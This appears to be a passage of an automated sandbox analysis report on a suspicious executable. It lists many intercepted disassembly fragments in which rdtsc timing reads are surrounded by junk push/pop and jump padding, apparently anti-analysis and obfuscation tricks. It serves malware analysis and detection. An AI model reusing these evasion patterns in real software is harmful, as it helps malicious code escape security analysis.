Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16CE683 second address: 16CE6B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EEh 0x00000007 jng 00007FB6E8B0C7E6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f pop edi 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FB6E8B0C7F1h 0x00000018 jng 00007FB6E8B0C7E6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16CE6B6 second address: 16CE6BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D3056 second address: 16D307C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ecx 0x00000009 push esi 0x0000000a jmp 00007FB6E8B0C7F8h 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D307C second address: 16D3080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D3080 second address: 16D3084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16893B7 second address: 1689403 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 nop 0x00000007 push 00000000h 0x00000009 push esi 0x0000000a call 00007FB6E8B0AED8h 0x0000000f pop esi 0x00000010 mov dword ptr [esp+04h], esi 0x00000014 add dword ptr [esp+04h], 0000001Ah 0x0000001c inc esi 0x0000001d push esi 0x0000001e ret 0x0000001f pop esi 0x00000020 ret 0x00000021 mov dword ptr [ebp+129C197Eh], edi 0x00000027 clc 0x00000028 lea eax, dword ptr [ebp+12B7B100h] 0x0000002e jmp 00007FB6E8B0AEE1h 0x00000033 nop 0x00000034 push esi 0x00000035 push ecx 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689403 second address: 1689424 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop esi 0x00000006 push eax 0x00000007 push ecx 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FB6E8B0C7F7h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689896 second address: 16898A8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FB6E8B0AED6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FB6E8B0AED6h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16898A8 second address: 16898BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jne 00007FB6E8B0C7E8h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689BCD second address: 1689BD1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1689D87 second address: 1689D8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A55D second address: 168A561 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A561 second address: 168A565 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A5EC second address: 168A604 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FB6E8B0AEE0h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A604 second address: 168A67D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7F5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007FB6E8B0C7E8h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 adc dl, 00000055h 0x00000027 lea eax, dword ptr [ebp+12B7B144h] 0x0000002d sub dword ptr [ebp+129C384Dh], edi 0x00000033 xor edi, 78D9A94Fh 0x00000039 push eax 0x0000003a push eax 0x0000003b jne 00007FB6E8B0C7E8h 0x00000041 pop eax 0x00000042 mov dword ptr [esp], eax 0x00000045 jng 00007FB6E8B0C7E6h 0x0000004b lea eax, dword ptr [ebp+12B7B100h] 0x00000051 xor edx, dword ptr [ebp+129C2A6Ah] 0x00000057 push eax 0x00000058 push edi 0x00000059 push eax 0x0000005a push edx 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A67D second address: 168A681 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 168A681 second address: 166EDEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push edx 0x0000000d call 00007FB6E8B0C7E8h 0x00000012 pop edx 0x00000013 mov dword ptr [esp+04h], edx 0x00000017 add dword ptr [esp+04h], 00000015h 0x0000001f inc edx 0x00000020 push edx 0x00000021 ret 0x00000022 pop edx 0x00000023 ret 0x00000024 call dword ptr [ebp+129C1A68h] 0x0000002a push esi 0x0000002b jmp 00007FB6E8B0C7F3h 0x00000030 push ebx 0x00000031 push eax 0x00000032 push edx 0x00000033 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D22DD second address: 16D22FC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE0h 0x00000009 pop ebx 0x0000000a jno 00007FB6E8B0AEDAh 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D22FC second address: 16D2340 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FB6E8B0C802h 0x00000008 push eax 0x00000009 push edx 0x0000000a jc 00007FB6E8B0C7E6h 0x00000010 jmp 00007FB6E8B0C7F8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2340 second address: 16D2344 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2344 second address: 16D2355 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jo 00007FB6E8B0C7F4h 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2660 second address: 16D2664 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2664 second address: 16D2670 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FB6E8B0C7E6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2670 second address: 16D2685 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE0h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D2BFE second address: 16D2C04 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D5EB8 second address: 16D5EBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D5EBF second address: 16D5EC4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D9EA5 second address: 16D9ED0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE5h 0x00000009 pop edx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007FB6E8B0AEDEh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16D9A22 second address: 16D9A27 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCC8A second address: 16DCC8E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCC8E second address: 16DCC94 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCC94 second address: 16DCC9A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCDFE second address: 16DCE20 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 je 00007FB6E8B0C7FCh 0x0000000c jmp 00007FB6E8B0C7F0h 0x00000011 js 00007FB6E8B0C7E6h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCE20 second address: 16DCE3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FB6E8B0AEE7h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCE3C second address: 16DCE49 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 ja 00007FB6E8B0C7E6h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16DCE49 second address: 16DCE5C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0AEDFh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2AE2 second address: 16E2AE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2C64 second address: 16E2C99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007FB6E8B0AEE0h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007FB6E8B0AEE8h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2C99 second address: 16E2C9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E2E1E second address: 16E2E22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E7CD0 second address: 16E7CE8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 jmp 00007FB6E8B0C7EDh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E7CE8 second address: 16E7D17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FB6E8B0AEE5h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e ja 00007FB6E8B0AED6h 0x00000014 pop ebx 0x00000015 jnl 00007FB6E8B0AEDAh 0x0000001b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E71E8 second address: 16E71EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E7361 second address: 16E7397 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 jmp 00007FB6E8B0AEDEh 0x0000000e jns 00007FB6E8B0AED6h 0x00000014 jmp 00007FB6E8B0AEE8h 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E74C1 second address: 16E74F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop eax 0x00000007 pushad 0x00000008 jg 00007FB6E8B0C7FBh 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FB6E8B0C7EDh 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E74F3 second address: 16E74FF instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a push esi 0x0000000b pop esi 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16E74FF second address: 16E7512 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6E8B0C7E6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FB6E8B0C7E6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA420 second address: 16EA442 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 jns 00007FB6E8B0AED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jmp 00007FB6E8B0AEE6h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA5B0 second address: 16EA5BB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA5BB second address: 16EA5D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB6E8B0AED6h 0x0000000a pop edi 0x0000000b jo 00007FB6E8B0AEDEh 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA75E second address: 16EA78C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB6E8B0C7EAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a pushad 0x0000000b jno 00007FB6E8B0C7ECh 0x00000011 push esi 0x00000012 jmp 00007FB6E8B0C7EFh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA78C second address: 16EA7A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FB6E8B0AEE6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16EA7A9 second address: 16EA7AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F166D second address: 16F1688 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE7h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1688 second address: 16F1692 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FB6E8B0C7E6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1692 second address: 16F16A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FB6E8B0AEDDh 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1AE6 second address: 16F1AF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0C7EEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F1AF8 second address: 16F1AFE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F22F4 second address: 16F22F8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F2627 second address: 16F262B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F2BD4 second address: 16F2BD8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F31BC second address: 16F31C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F31C0 second address: 16F31C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F8376 second address: 16F8395 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEE2h 0x00000009 pop esi 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F8395 second address: 16F839C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F839C second address: 16F83C4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jbe 00007FB6E8B0AEF5h 0x0000000d jmp 00007FB6E8B0AEE9h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F83C4 second address: 16F83F5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jg 00007FB6E8B0C7E8h 0x0000000e pushad 0x0000000f jmp 00007FB6E8B0C7F7h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 jnp 00007FB6E8B0C7E6h 0x0000001c popad 0x0000001d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F75C9 second address: 16F75DE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007FB6E8B0AEDFh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F7CFF second address: 16F7D1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FB6E8B0C7E6h 0x0000000a pushad 0x0000000b popad 0x0000000c jnl 00007FB6E8B0C7E6h 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jns 00007FB6E8B0C7E8h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F7E8E second address: 16F7EAE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FB6E8B0AEE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jng 00007FB6E8B0AED6h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16F7EAE second address: 16F7EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 16FCE2E second address: 16FCE52 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FB6E8B0AEDFh 0x00000009 pop edx 0x0000000a pop ecx 0x0000000b jbe 00007FB6E8B0AEE4h 0x00000011 push eax 0x00000012 jnp 00007FB6E8B0AED6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17080B4 second address: 17080BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17080BA second address: 17080BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17080BE second address: 17080D0 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007FB6E8B0C7EEh 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17060F8 second address: 17060FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17060FE second address: 1706102 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170659B second address: 17065A7 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 17066F8 second address: 17066FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 170686D second address: 1706871 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706871 second address: 170688D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jmp 00007FB6E8B0C7EEh 0x0000000c jl 00007FB6E8B0C7E6h 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706A0D second address: 1706A15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706A15 second address: 1706A22 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B68 second address: 1706B6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B6C second address: 1706B70 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B70 second address: 1706B79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\ZFttiy4Tt8.exeRDTSC instruction interceptor: First address: 1706B79 second address: 1706B98 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007FB6E8B0C7F4h 0x0000000f pop edx 0x00000010 rdtsc
